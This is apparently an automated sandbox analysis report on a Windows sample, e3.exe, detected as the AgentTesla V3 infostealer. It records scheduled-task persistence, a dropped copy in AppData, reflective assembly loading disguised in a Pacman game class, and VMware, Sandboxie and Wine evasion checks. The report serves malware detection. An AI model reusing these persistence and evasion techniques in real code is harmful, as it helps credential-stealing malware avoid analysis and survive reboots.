                Source: 00000004.00000002.638824586.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: Process Memory Space: e3.exe PID: 6540, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_00DCC124
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_00DCE570
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_00DCE561
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_0727B5B9
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_07275F00
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_07275630
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_07277590
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_072752E8
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_003E492E
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_00EEAB50
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_00EE9390
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_00EE3C20
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_00EE3C10
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_02B447A0
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_02B4D830
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_02B4E015
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_02B44790
                Source: C:\Users\user\Desktop\e3.exeCode function: 4_2_0096492E
                Source: e3.exe, 00000000.00000002.412396501.000000000046C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaFU.exe8 vs e3.exe
                Source: e3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVNxUTlsrYnEOZEGglzLKYFAk.exe4 vs e3.exe
                Source: e3.exe, 00000000.00000002.416036513.0000000003B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameaFU.exe8 vs e3.exe
                Source: e3.exe, 00000000.00000002.418778941.0000000006E10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs e3.exe
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVNxUTlsrYnEOZEGglzLKYFAk.exe4 vs e3.exe
                Source: e3.exe, 00000000.00000002.419018802.0000000007170000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs e3.exe
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs e3.exe
                Source: e3.exe, 00000004.00000000.397283610.00000000009EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaFU.exe8 vs e3.exe
                Source: e3.exe, 00000004.00000002.636427550.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVNxUTlsrYnEOZEGglzLKYFAk.exe4 vs e3.exe
                Source: e3.exe, 00000004.00000002.637255643.0000000000D78000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs e3.exe
                Source: e3.exeBinary or memory string: OriginalFilenameaFU.exe8 vs e3.exe
                Source: e3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: PhOyTxcSdzas.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: e3.exeVirustotal: Detection: 70%
                Source: e3.exeReversingLabs: Detection: 73%
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Users\user\Desktop\e3.exeJump to behavior
                Source: e3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\e3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\e3.exe "C:\Users\user\Desktop\e3.exe"
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Users\user\Desktop\e3.exe {path}
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Users\user\Desktop\e3.exe {path}
                Source: C:\Users\user\Desktop\e3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeFile created: C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exeJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile created: C:\Users\user\AppData\Local\Temp\tmp799E.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/4@5/2
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\e3.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\e3.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_01
                Source: C:\Users\user\Desktop\e3.exeMutant created: \Sessions\1\BaseNamedObjects\smhCeAsrvUDHcsOIuGsUNikjnIZ
                Source: 4.0.e3.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.0.e3.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.0.e3.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.0.e3.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.0.e3.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 4.0.e3.exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\e3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: e3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: e3.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation

                barindex
                Source: e3.exe, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: PhOyTxcSdzas.exe.0.dr, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.e3.exe.3e0000.0.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.e3.exe.3e0000.0.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.e3.exe.960000.11.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.e3.exe.960000.9.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.e3.exe.960000.5.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.2.e3.exe.960000.1.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.e3.exe.960000.2.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 4.0.e3.exe.960000.0.unpack, GamePackman/Pacman.cs.Net Code: x System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\e3.exeCode function: 0_2_0727F23D push FFFFFF8Bh; iretd
                Source: initial sampleStatic PE information: section name: .text entropy: 7.0947987409
                Source: initial sampleStatic PE information: section name: .text entropy: 7.0947987409
                Source: C:\Users\user\Desktop\e3.exeFile created: C:\Users\user\AppData\Roaming\PhOyTxcSdzas.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp
                Source: C:\Users\user\Desktop\e3.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\e3.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e3.exe PID: 6384, type: MEMORYSTR
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\e3.exe TID: 6476Thread sleep time: -18446744073709540s >= -30000s
                Source: C:\Users\user\Desktop\e3.exe TID: 6388Thread sleep time: -41500s >= -30000s
                Source: C:\Users\user\Desktop\e3.exe TID: 6452Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\e3.exe TID: 4040Thread sleep time: -36893488147419080s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e3.exeWindow / User API: threadDelayed 4310
                Source: C:\Users\user\Desktop\e3.exeWindow / User API: threadDelayed 1798
                Source: C:\Users\user\Desktop\e3.exeWindow / User API: threadDelayed 5911
                Source: C:\Users\user\Desktop\e3.exeWindow / User API: threadDelayed 3890
                Source: C:\Users\user\Desktop\e3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                Source: C:\Users\user\Desktop\e3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\e3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\e3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                Source: C:\Users\user\Desktop\e3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\e3.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 41500
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\e3.exeThread delayed: delay time: 922337203685477
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: e3.exe, 00000000.00000002.413876682.0000000002871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: e3.exe, 00000000.00000002.413950104.00000000028D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
                Source: e3.exe, 00000004.00000003.627728883.000000000115B000.00000004.00000020.00020000.00000000.sdmp, e3.exe, 00000004.00000003.625072005.0000000001171000.00000004.00000020.00020000.00000000.sdmp, e3.exe, 00000004.00000003.629186670.000000000116A000.00000004.00000020.00020000.00000000.sdmp, e3.exe, 00000004.00000003.624997696.0000000001158000.00000004.00000020.00020000.00000000.sdmp, e3.exe, 00000004.00000002.637793241.000000000116A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\e3.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\e3.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\e3.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\e3.exeMemory written: C:\Users\user\Desktop\e3.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PhOyTxcSdzas" /XML "C:\Users\user\AppData\Local\Temp\tmp799E.tmp
                Source: C:\Users\user\Desktop\e3.exeProcess created: C:\Users\user\Desktop\e3.exe {path}
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Users\user\Desktop\e3.exe VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e3.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
